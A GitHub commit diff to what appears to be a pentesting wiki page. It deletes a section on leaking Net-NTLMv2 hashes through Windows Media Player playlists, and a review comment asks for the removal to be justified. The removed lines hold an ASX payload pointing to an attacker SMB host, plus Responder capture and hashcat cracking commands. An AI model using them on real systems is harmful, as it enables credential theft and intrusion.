Update phishing-documents.md

This commit is contained in:
SirBroccoli 2025-09-07 23:21:49 +02:00 committed by GitHub
parent cb51b0dcf8
commit 9a95bc80a3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194


@ -160,38 +160,6 @@ There are several ways to **force NTLM authentication "remotely"**, for example,
../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md
{{#endref}}
### Windows Media Player playlists (.ASX/.WAX) to coerce NTLM
If a workflow automatically previews media (e.g., HR reviewing uploads) using Windows Media Player, you can leak Net-NTLMv2 by providing a playlist that references a UNC path. When WMP loads the entry, it attempts SMB access with implicit NTLM authentication.
Example ASX payload (also supported by .WAX):
```xml
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://10.10.14.148\test\pwn.mp3" />
</entry>
</asx>
```
Collect and crack the hash:
```bash
# Capture Net-NTLMv2
sudo Responder -I <iface>
# Or run via uv if you manage dependencies with it
# sudo uv run --script Responder.py -I <iface>
# Crack (hashcat auto-detects NetNTLMv2, mode 5600)
hashcat ntlm.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
```
Notes
- Use ntlm_theft to generate ready-made WMP coercion files: https://github.com/Greenwolf/ntlm_theft
- If NTLM signing/SMB egress is blocked or NTLM disabled, this wont work. Otherwise, its effective when targets auto-open or preview uploaded playlists.
### NTLM Relay
Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**:
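Review bot: the commit message ("Update phishing-documents.md") gives no reason for this change, and the hunk header (38 old lines, 6 new) shows that everything between the `{{#endref}}` context and the `### NTLM Relay` heading, i.e. the whole "Windows Media Player playlists (.ASX/.WAX) to coerce NTLM" section, is being dropped. State the reason in the message (consolidated elsewhere, duplicate of the places-to-steal-ntlm-creds page, or content found inaccurate), and if the material now lives in another page, keep a one-line pointer to it under the NTLM section so readers of this page still find the mitigation note that went with it ("If NTLM signing/SMB egress is blocked or NTLM disabled, this wont work"), which is the only defensive guidance this hunk removes. If the section is being moved rather than deleted, the spelling fixes it needs ("wont" -> "won't", "its" -> "it's") should travel with it.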